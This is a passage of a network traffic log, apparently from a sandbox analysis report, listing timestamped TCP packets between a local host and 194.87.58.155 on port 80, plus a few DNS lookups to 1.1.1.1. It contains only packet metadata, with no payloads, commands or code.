Dec 31, 2024 00:33:03.451385021 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.451447964 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.451455116 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.451515913 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.451523066 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.451530933 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.451539040 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.451561928 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.451569080 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.451663017 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.451672077 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.451679945 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.451687098 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.451692104 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.451698065 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.451719999 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.451728106 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.451740980 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.451749086 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.451822042 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.451828957 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.451837063 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.451843977 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.451875925 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.451884031 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.451952934 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.451958895 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.451967001 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.451973915 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.452023983 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.452034950 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.452043056 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.452049017 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.452071905 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.452080011 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.452086926 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.452095032 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.452110052 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.452116966 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.452125072 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.452127934 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.452172041 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.452178955 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.452187061 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.452202082 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.452209949 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.452213049 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.452224016 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.452230930 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.452240944 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.452287912 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.452296019 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.452299118 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.452351093 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.452358961 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.452374935 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.452382088 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.452395916 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.452403069 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.452459097 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.452466011 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.452477932 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.452481985 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.452483892 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.452486992 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.452503920 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.452511072 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.452514887 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.452542067 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.452549934 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.452553034 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.452609062 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.452616930 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.452624083 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.452630997 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.452637911 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.452646017 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.452819109 CET	49731	80	192.168.2.4	194.87.58.155
Dec 31, 2024 00:33:03.452888966 CET	49731	80	192.168.2.4	194.87.58.155
Dec 31, 2024 00:33:03.455925941 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.455996990 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.456006050 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.456043005 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.456049919 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.456079960 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.456088066 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.456099033 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.456108093 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.456137896 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.456150055 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.456217051 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.456224918 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.456238985 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.456245899 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.456249952 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.457844973 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.457869053 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.457873106 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.457875013 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.457878113 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.457894087 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.457901955 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.457905054 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.457911015 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.457917929 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.457926035 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.457933903 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.457941055 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.457947969 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.457956076 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.457962990 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.457983017 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.457986116 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.457988977 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.457992077 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.458033085 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.458040953 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.458048105 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.458064079 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.458071947 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.458081007 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.458089113 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.458091021 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.458125114 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.458132029 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.458134890 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.458142042 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.458148003 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.458162069 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.458168030 CET	49731	80	192.168.2.4	194.87.58.155
Dec 31, 2024 00:33:03.458193064 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.458201885 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.458215952 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.458221912 CET	49731	80	192.168.2.4	194.87.58.155
Dec 31, 2024 00:33:03.458225012 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.458241940 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.458249092 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.458285093 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.458292007 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.458303928 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.458328009 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.458334923 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.458342075 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.458422899 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.458425999 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.458429098 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.458431959 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.458435059 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.458437920 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.458450079 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.463021994 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.463032007 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.463069916 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.463078022 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.463087082 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.463097095 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.463135958 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.463143110 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.463191032 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.463198900 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.463202953 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.463206053 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.463243008 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.463249922 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.463284016 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.463291883 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.463351965 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.463359118 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.463366985 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.463373899 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.463448048 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.463454962 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.463462114 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.463469028 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.463491917 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.463500977 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.463531971 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.463540077 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.463588953 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.463599920 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.463608980 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.463618040 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.463630915 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.463639975 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.463685989 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.463694096 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.463702917 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.463710070 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.463748932 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.463757038 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.463759899 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.463762999 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.463799953 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.463808060 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.463821888 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.463829041 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.463843107 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.463850975 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.463907003 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.463917971 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.463926077 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.463928938 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.463943958 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.465075970 CET	49731	80	192.168.2.4	194.87.58.155
Dec 31, 2024 00:33:03.465152979 CET	49731	80	192.168.2.4	194.87.58.155
Dec 31, 2024 00:33:03.469922066 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.469947100 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.470077038 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.470084906 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.470093966 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.470103025 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.470109940 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.470125914 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.470134020 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.470136881 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.470139980 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.470146894 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.470155001 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.470158100 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.470218897 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.470227957 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.470235109 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.470242977 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.470277071 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.470283985 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.470326900 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.470334053 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.470341921 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.470345020 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.470381021 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.470388889 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.470422029 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.470429897 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.470438004 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.470448017 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.470488071 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.470494986 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.470510006 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.470518112 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.470532894 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.470541000 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.470563889 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.470580101 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.470623970 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.470632076 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.470659018 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.470668077 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.470681906 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.470689058 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.470735073 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.470743895 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.470760107 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.470766068 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.470797062 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.470818043 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.470833063 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.470840931 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.470846891 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.471822977 CET	49731	80	192.168.2.4	194.87.58.155
Dec 31, 2024 00:33:03.476706982 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.476721048 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.476737976 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.476747036 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.476783991 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.476792097 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.476871967 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.476881027 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.476883888 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.476891994 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.476902008 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.476908922 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.476970911 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.476980925 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.476989031 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.476996899 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.477014065 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.477021933 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.477082968 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.477092028 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.477099895 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.477107048 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.477154016 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.477164030 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.477173090 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.477180958 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.477188110 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.477196932 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.477268934 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.477277994 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.477286100 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.477293968 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.477302074 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.477310896 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.477319002 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.477327108 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.477339029 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.477348089 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.477355957 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.477363110 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.477380991 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.477389097 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.477396965 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:03.477405071 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:06.035794020 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:06.035819054 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:06.035897970 CET	49731	80	192.168.2.4	194.87.58.155
Dec 31, 2024 00:33:06.036082029 CET	49731	80	192.168.2.4	194.87.58.155
Dec 31, 2024 00:33:06.040911913 CET	80	49731	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:06.620713949 CET	49732	80	192.168.2.4	194.87.58.155
Dec 31, 2024 00:33:06.625663042 CET	80	49732	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:06.625756979 CET	49732	80	192.168.2.4	194.87.58.155
Dec 31, 2024 00:33:06.625931978 CET	49732	80	192.168.2.4	194.87.58.155
Dec 31, 2024 00:33:06.630784988 CET	80	49732	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:07.547981024 CET	80	49732	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:07.548043013 CET	80	49732	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:07.548125029 CET	49732	80	192.168.2.4	194.87.58.155
Dec 31, 2024 00:33:07.548363924 CET	49732	80	192.168.2.4	194.87.58.155
Dec 31, 2024 00:33:07.553195000 CET	80	49732	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:08.509848118 CET	49733	80	192.168.2.4	194.87.58.155
Dec 31, 2024 00:33:08.514786005 CET	80	49733	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:08.515089989 CET	49733	80	192.168.2.4	194.87.58.155
Dec 31, 2024 00:33:08.515726089 CET	49733	80	192.168.2.4	194.87.58.155
Dec 31, 2024 00:33:08.520530939 CET	80	49733	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:09.893620014 CET	80	49733	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:09.893896103 CET	49733	80	192.168.2.4	194.87.58.155
Dec 31, 2024 00:33:09.893946886 CET	80	49733	194.87.58.155	192.168.2.4
Dec 31, 2024 00:33:09.894093990 CET	49733	80	192.168.2.4	194.87.58.155
Dec 31, 2024 00:33:09.898658037 CET	80	49733	194.87.58.155	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 31, 2024 00:32:58.594719887 CET	50374	53	192.168.2.4	1.1.1.1
Dec 31, 2024 00:32:58.594768047 CET	50374	53	192.168.2.4	1.1.1.1
Dec 31, 2024 00:32:58.601954937 CET	53	50374	1.1.1.1	192.168.2.4
Dec 31, 2024 00:32:58.602014065 CET	53	50374	1.1.1.1	192.168.2.4
Dec 31, 2024 00:33:02.106849909 CET	50377	53	192.168.2.4	1.1.1.1
Dec 31, 2024 00:33:02.106909990 CET	50377	53	192.168.2.4	1.1.1.1
Dec 31, 2024 00:33:02.585556984 CET	53	50377	1.1.1.1	192.168.2.4
Dec 31, 2024 00:33:02.965569019 CET	53	50377	1.1.1.1	192.168.2.4
Dec 31, 2024 00:33:06.060652018 CET	50379	53	192.168.2.4	1.1.1.1
Dec 31, 2024 00:33:06.060710907 CET	50379	53	192.168.2.4	1.1.1.1
Dec 31, 2024 00:33:06.563453913 CET	53	50379	1.1.1.1	192.168.2.4
Dec 31, 2024 00:33:06.619741917 CET	53	50379	1.1.1.1	192.168.2.4
